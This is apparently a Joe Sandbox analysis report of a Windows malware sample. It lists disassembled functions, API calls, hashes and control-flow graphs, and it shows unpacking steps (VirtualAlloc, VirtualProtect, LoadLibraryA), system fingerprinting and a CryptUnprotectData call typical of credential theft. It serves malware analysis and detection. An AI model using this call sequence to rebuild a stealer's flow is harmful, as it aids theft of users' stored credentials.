                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodersGdipImage$Size
                                                                                                    • String ID: image/png
                                                                                                    • API String ID: 864223233-2966254431
                                                                                                    • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                    • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                    • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                    • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                    APIs
                                                                                                    • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 1452528299-2698495834
                                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                    • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                    • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                    APIs
                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___std_exception_destroy
                                                                                                    • String ID: F(@$ios_base::failbit set
                                                                                                    • API String ID: 4194217158-1828034088
                                                                                                    • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                    • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                    • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                    • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_catch
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 3886170330-2084237596
                                                                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                    APIs
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                      • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                      • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                      • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                      • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: F@
                                                                                                    • API String ID: 2118720939-885931407
                                                                                                    • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                    • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                    • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                    • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                    APIs
                                                                                                    • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                      • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                    Strings
                                                                                                    • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                    • String ID: Access violation - no RTTI data!
                                                                                                    • API String ID: 2053020834-2158758863
                                                                                                    • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                    • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                    • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                    • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                    APIs
                                                                                                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                    • String ID: zB$~B
                                                                                                    • API String ID: 3275300208-395995950
                                                                                                    • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                    • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                    • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                    • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                    APIs
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pThreadProxy
                                                                                                    • API String ID: 1687795959-3651400591
                                                                                                    • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                    • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                    • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                    • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CommandLine
                                                                                                    • String ID: %b
                                                                                                    • API String ID: 3253501508-2944287759
                                                                                                    • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                    • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                                    • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                    • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                    • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                    • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                    • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                    • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02102AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02102AAD,00000000), ref: 0212B187
                                                                                                    • GetLastError.KERNEL32 ref: 0212B195
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02102AAD,00000000), ref: 0212B1F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                                                                    • Instruction ID: a3d33d0755ac16a9334b80bebfd3b6d0b518a06ab4bb288bd1fceb28e9769edf
                                                                                                    • Opcode Fuzzy Hash: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                                                                    • Instruction Fuzzy Hash: 7F411630688336AFCF259F64DC4476E7BB5EF41718F154168F859A71A0DB30AA29CB60

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.7%
                                                                                                    Dynamic/Decrypted Code Coverage:20.7%
                                                                                                    Signature Coverage:25.7%
                                                                                                    Total number of Nodes:140
                                                                                                    Total number of Limit Nodes:11
                                                                                                    execution_graph 27117 408a60 27119 408a6f 27117->27119 27118 408d05 ExitProcess 27119->27118 27120 408a84 GetCurrentProcessId GetCurrentThreadId 27119->27120 27129 408cf7 27119->27129 27122 408ac3 SHGetSpecialFolderPathW GetForegroundWindow 27120->27122 27123 408abd 27120->27123 27124 408b95 27122->27124 27123->27122 27124->27124 27132 4404b0 27124->27132 27126 408c27 27127 408cee 27126->27127 27135 40d400 CoInitializeEx 27126->27135 27127->27129 27136 442000 FreeLibrary 27129->27136 27137 443770 27132->27137 27134 4404ba RtlAllocateHeap 27134->27126 27136->27118 27138 4437a0 27137->27138 27138->27134 27138->27138 27060 4423c5 GetForegroundWindow 27064 444110 27060->27064 27062 4423d1 GetForegroundWindow 27063 4423ec 27062->27063 27065 444124 27064->27065 27065->27062 27144 40daa3 27145 40dad0 27144->27145 27148 43d0d0 27145->27148 27147 40dc55 27149 43d120 27148->27149 27149->27149 27150 43d529 CoCreateInstance 27149->27150 27151 43d585 SysAllocString 27150->27151 27152 43db6d 27150->27152 27155 43d62c 27151->27155 27154 43db7d GetVolumeInformationW 27152->27154 27161 43db9b 27154->27161 27156 43d634 CoSetProxyBlanket 27155->27156 27157 43db5c SysFreeString 27155->27157 27158 43db52 27156->27158 27159 43d654 SysAllocString 27156->27159 27157->27152 27158->27157 27162 43d740 27159->27162 27161->27147 27162->27162 27163 43d764 SysAllocString 27162->27163 27165 43d78a 27163->27165 27164 43db39 SysFreeString SysFreeString 27164->27158 27165->27164 27166 43db2f SysFreeString 27165->27166 27167 43d7ce VariantInit 27165->27167 27166->27164 27169 43d850 27167->27169 27168 43db1e VariantClear 27168->27166 27169->27168 27170 418ba2 27171 418c10 27170->27171 27171->27171 27172 418fb7 27171->27172 27173 445260 LdrInitializeThunk 27171->27173 27172->27172 27173->27171 27174 442020 27175 442038 27174->27175 27176 44205a 27174->27176 27178 442060 27174->27178 27175->27178 27179 44204b RtlReAllocateHeap 27175->27179 27177 4404b0 RtlAllocateHeap 27176->27177 27177->27178 27179->27178 27180 4404e2 27181 4404f0 27180->27181 27182 4404f2 27180->27182 27183 4404f7 RtlFreeHeap 27182->27183 27066 20a0000 27069 20a0006 27066->27069 27070 20a0015 27069->27070 27073 20a07a6 27070->27073 27074 20a07c1 27073->27074 27075 20a07ca CreateToolhelp32Snapshot 27074->27075 27076 20a07e6 Module32First 27074->27076 27075->27074 27075->27076 27077 20a07f5 27076->27077 27079 20a0005 27076->27079 27080 20a0465 27077->27080 27081 20a0490 27080->27081 27082 20a04a1 VirtualAlloc 27081->27082 27083 20a04d9 27081->27083 27082->27083 27184 20d003c 27185 20d0049 27184->27185 27199 20d0e0f SetErrorMode SetErrorMode 27185->27199 27190 20d0265 27191 20d02ce VirtualProtect 27190->27191 27193 20d030b 27191->27193 27192 20d0439 VirtualFree 27197 20d05f4 LoadLibraryA 27192->27197 27198 20d04be 27192->27198 27193->27192 27194 20d04e3 LoadLibraryA 27194->27198 27196 20d08c7 27197->27196 27198->27194 27198->27197 27200 20d0223 27199->27200 27201 20d0d90 27200->27201 27202 20d0dad 27201->27202 27203 20d0dbb GetPEB 27202->27203 27204 20d0238 VirtualAlloc 27202->27204 27203->27204 27204->27190 27205 4180f0 27205->27205 27207 4180f8 27205->27207 27206 418468 CryptUnprotectData 27207->27206 27084 421710 27085 42171e 27084->27085 27089 421778 27084->27089 27090 421830 27085->27090 27092 421840 27090->27092 27092->27092 27094 445260 27092->27094 27093 421971 27095 445280 27094->27095 27096 44536e 27095->27096 27098 442080 LdrInitializeThunk 27095->27098 27096->27093 27098->27096 27208 421b30 27220 4450f0 27208->27220 27210 421b77 27211 4404b0 RtlAllocateHeap 27210->27211 27214 42228c 27210->27214 27212 421bd2 27211->27212 27219 421be9 27212->27219 27224 442080 LdrInitializeThunk 27212->27224 27215 4404b0 RtlAllocateHeap 27215->27219 27216 421cb9 27216->27214 27226 442080 LdrInitializeThunk 27216->27226 27219->27215 27219->27216 27225 442080 LdrInitializeThunk 27219->27225 27222 445110 27220->27222 27221 445208 27221->27210 27222->27221 27227 442080 LdrInitializeThunk 27222->27227 27224->27212 27225->27219 27226->27216 27227->27221 27228 40d433 CoInitializeSecurity 27099 445450 27100 44548f 27099->27100 27101 445469 27099->27101 27101->27100 27105 442080 LdrInitializeThunk 27101->27105 27103 4454b8 27103->27100 27106 442080 LdrInitializeThunk 27103->27106 27105->27103 27106->27100 27107 444210 27108 444230 27107->27108 27110 4442af 27108->27110 27111 442080 LdrInitializeThunk 27108->27111 27111->27110 27229 4425f2 27230 442602 27229->27230 27231 44261e 27229->27231 27230->27231 27233 442080 LdrInitializeThunk 27230->27233 27233->27231 27239 40ebff 27240 40ec7e 27239->27240 27241 40ec5f 27239->27241 27243 40ed2e 27240->27243 27245 442080 LdrInitializeThunk 27240->27245 27241->27240 27246 442080 LdrInitializeThunk 27241->27246 27245->27243 27246->27240 27247 442b3b 27248 442b45 27247->27248 27248->27248 27249 442c0e 27248->27249 27251 442080 LdrInitializeThunk 27248->27251 27251->27249

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 43d0d0-43d112 1 43d120-43d18e 0->1 1->1 2 43d190-43d1b6 1->2 3 43d1c0-43d1f8 2->3 3->3 4 43d1fa-43d25f 3->4 5 43d260-43d289 4->5 5->5 6 43d28b-43d2a8 5->6 8 43d2ae-43d2b8 6->8 9 43d3bd-43d3d5 6->9 10 43d2c0-43d31d 8->10 11 43d3e0-43d3ff 9->11 10->10 12 43d31f-43d349 10->12 11->11 13 43d401-43d47b 11->13 15 43d350-43d3af 12->15 14 43d480-43d4c0 13->14 14->14 16 43d4c2-43d51f 14->16 15->15 17 43d3b1-43d3b5 15->17 18 43d520-43d527 16->18 17->9 18->18 19 43d529-43d57f CoCreateInstance 18->19 20 43d585-43d5d5 19->20 21 43db6d-43db99 call 443b60 GetVolumeInformationW 19->21 22 43d5e0-43d605 20->22 26 43dba2-43dba4 21->26 27 43db9b-43db9e 21->27 22->22 24 43d607-43d62e SysAllocString 22->24 32 43d634-43d64e CoSetProxyBlanket 24->32 33 43db5c-43db69 SysFreeString 24->33 28 43dbc7-43dbd2 26->28 27->26 30 43dbd4-43dbdb 28->30 31 43dbde-43dc0b 28->31 30->31 34 43dc10-43dc6a 31->34 35 43db52-43db58 32->35 36 43d654-43d67f 32->36 33->21 34->34 37 43dc6c-43dc97 34->37 35->33 38 43d680-43d6a5 36->38 39 43dca0-43dcdc 37->39 38->38 40 43d6a7-43d732 SysAllocString 38->40 39->39 41 43dcde-43dd02 call 41dce0 39->41 42 43d740-43d762 40->42 47 43dd10-43dd17 41->47 42->42 44 43d764-43d78c SysAllocString 42->44 48 43d792-43d7b4 44->48 49 43db39-43db4e SysFreeString * 2 44->49 47->47 50 43dd19-43dd2c 47->50 57 43d7ba-43d7bd 48->57 58 43db2f-43db36 SysFreeString 48->58 49->35 51 43dd32-43dd45 call 408430 50->51 52 43dbb0-43dbc1 50->52 51->52 52->28 54 43dd4a-43dd51 52->54 57->58 59 43d7c3-43d7c8 57->59 58->49 59->58 60 43d7ce-43d843 VariantInit 59->60 61 43d850-43d8d3 60->61 61->61 62 43d8d9-43d8f2 61->62 63 43d8f6-43d8fb 62->63 64 43d901-43d90a 63->64 65 43db1e-43db2b VariantClear 63->65 64->65 66 43d910-43d91f 64->66 65->58 67 43d921-43d926 66->67 68 43d95d 66->68 70 43d93c-43d940 67->70 69 43d95f-43d97d call 408270 68->69 79 43d983-43d997 69->79 80 43dac9-43dada 69->80 71 43d942-43d94b 70->71 72 43d930 70->72 74 43d952-43d956 71->74 75 43d94d-43d950 71->75 77 43d931-43d93a 72->77 74->77 78 43d958-43d95b 74->78 75->77 77->69 77->70 78->77 79->80 81 43d99d-43d9a3 79->81 82 43dae1-43daf2 80->82 83 43dadc 80->83 84 43d9b0-43d9ba 81->84 85 43daf4 82->85 86 43daf9-43db1b call 4082a0 call 408280 82->86 83->82 88 43d9d0-43d9d6 84->88 89 43d9bc-43d9c1 84->89 85->86 86->65 92 43d9f5-43da07 88->92 93 43d9d8-43d9db 88->93 91 43da60-43da76 89->91 97 43da79-43da7f 91->97 94 43da8b-43da94 92->94 95 43da0d-43da10 92->95 93->92 98 43d9dd-43d9f3 93->98 102 43da96-43da98 94->102 103 43da9a-43da9d 94->103 95->94 99 43da12-43da5f 95->99 97->80 101 43da81-43da83 97->101 98->91 99->91 101->84 104 43da89 101->104 102->97 105 43dac5-43dac7 103->105 106 43da9f-43dac3 103->106 104->80 105->91 106->91
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
                                                                                                    • SysAllocString.OLEAUT32 ref: 0043D608
                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
                                                                                                    • SysAllocString.OLEAUT32 ref: 0043D6A8
                                                                                                    • SysAllocString.OLEAUT32 ref: 0043D765
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0043D7D6
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                                    • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                                                    • API String ID: 505850577-1972840126
                                                                                                    • Opcode ID: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                                                    • Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
                                                                                                    • Opcode Fuzzy Hash: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                                                    • Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 317 408a60-408a71 call 4416b0 320 408d05-408d07 ExitProcess 317->320 321 408a77-408a7e call 43a2c0 317->321 324 408d00 call 442000 321->324 325 408a84-408abb GetCurrentProcessId GetCurrentThreadId 321->325 324->320 327 408ac3-408b93 SHGetSpecialFolderPathW GetForegroundWindow 325->327 328 408abd-408ac1 325->328 329 408b95-408bb7 327->329 330 408bdc-408bef 327->330 328->327 332 408bb9-408bbb 329->332 333 408bbd-408bda 329->333 331 408bf0-408c1c 330->331 331->331 334 408c1e-408c4a call 4404b0 331->334 332->333 333->330 337 408c50-408c8b 334->337 338 408cc4-408ce2 call 40a170 337->338 339 408c8d-408cc2 337->339 342 408ce4 call 40d400 338->342 343 408cee-408cf5 338->343 339->337 347 408ce9 call 40c050 342->347 343->324 345 408cf7-408cfd call 408280 343->345 345->324 347->343
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00408A84
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408A8E
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
                                                                                                    • GetForegroundWindow.USER32 ref: 00408B8B
                                                                                                    • ExitProcess.KERNEL32 ref: 00408D07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4063528623-0
                                                                                                    • Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                                                    • Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
                                                                                                    • Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                                                    • Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 350 40c080-40c2df 351 40c2e0-40c315 350->351 351->351 352 40c317-40c323 351->352 353 40c326-40c343 352->353
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 50$DM_e$FwPq$Js$'!
                                                                                                    • API String ID: 0-1711485358
                                                                                                    • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
                                                                                                    • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 354 418ba2-418c02 355 418c10-418c4c 354->355 355->355 356 418c4e-418c6e call 401dd0 355->356 359 418da0-418da6 call 408280 356->359 360 419040-419049 call 401f60 356->360 361 418d83-418d9c 356->361 362 418fa3-418fb0 356->362 363 418fe6-419010 call 41bdd0 356->363 364 418da9-418dba 356->364 365 419030 356->365 366 419050-419056 call 401f60 356->366 367 418c75-418ccb 356->367 368 418dd4-418de9 call 401e00 356->368 369 418fb7-418fc5 356->369 370 419018-419021 call 408280 356->370 371 41903a 356->371 359->364 360->366 373 418dbd-418dcd call 401df0 361->373 362->359 362->360 362->363 362->364 362->365 362->366 362->369 362->370 376 41905f-4195af 362->376 363->370 364->373 365->371 366->376 381 418cd0-418cf4 367->381 394 418e50 368->394 395 418deb-418df0 368->395 377 418fe1 369->377 378 418fc7-418fcf 369->378 370->365 371->360 373->359 373->360 373->362 373->363 373->364 373->365 373->366 373->368 373->369 373->370 373->371 373->376 377->363 388 418fd0-418fdf 378->388 381->381 391 418cf6-418d79 call 41bdd0 381->391 388->377 388->388 391->361 398 418e52-418e55 394->398 397 418e09-418e0b 395->397 400 418e00 397->400 401 418e0d-418e1e 397->401 402 418e60 398->402 403 418e57-418e5c 398->403 404 418e01-418e07 400->404 401->400 405 418e20-418e38 401->405 406 418e67-418eb2 call 408270 call 40aff0 402->406 403->406 404->397 404->398 405->400 407 418e3a-418e46 405->407 413 418ec0-418ec2 406->413 414 418eb4-418eb9 406->414 407->404 409 418e48-418e4b 407->409 409->404 415 418ec9-418ee4 call 408270 413->415 414->415 418 418f01-418f2f 415->418 419 418ee6-418eeb 415->419 421 418f30-418f4a 418->421 420 418ef0-418eff 419->420 420->418 420->420 421->421 422 418f4c-418f60 421->422 423 418f81-418f8f call 